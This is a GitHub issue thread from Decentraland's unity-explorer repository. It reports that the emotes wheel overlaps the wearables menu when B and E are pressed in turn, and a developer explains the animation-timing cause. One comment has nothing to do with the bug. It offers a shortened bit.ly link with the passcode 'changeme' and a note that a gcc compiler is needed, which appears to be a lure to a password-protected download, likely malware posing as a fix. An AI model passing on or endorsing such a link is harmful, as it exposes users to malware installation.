### ISSUE TITLE
[QA] Emotes menu is overlapping the Wearables menu 

### ISSUE THREAD

**Issue by DafGreco** [decentraland/unity-explorer#1981]
### **Explorer Alpha build versions:**
v0.25.3

### **Issue Description:**
When the user presses the key B+E , the wearables and the emotes menu is overlapping each other.

### **STR:** 

  1. Open v0.25.3
  2. Press B + E consecutively (but not at the same time)
  3. Validate that you are able to see the menus overlapping each other 

### **Expected behaviour:**
The emote menu should not appear on the wearables section

### **Current behaviour:**
Emotes menu is overlapping the Wearables menu

#### **Evidence:**
![image](https://github.com/user-attachments/assets/f4c17811-def8-4ee3-987d-5abde7595262)

https://github.com/user-attachments/assets/053021dc-87a3-4c6f-a8f2-eccd9a953edf

#### **Additional Notes:**
Windows 11 
RAM 16GB

**Comment by danilobalderramas** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by QThund** [comment]
It does not close the emotes wheel when the backpack menu is shown before the appearing animation of the wheel has finished. It's like it only configures the action of closing the wheel after the animation.
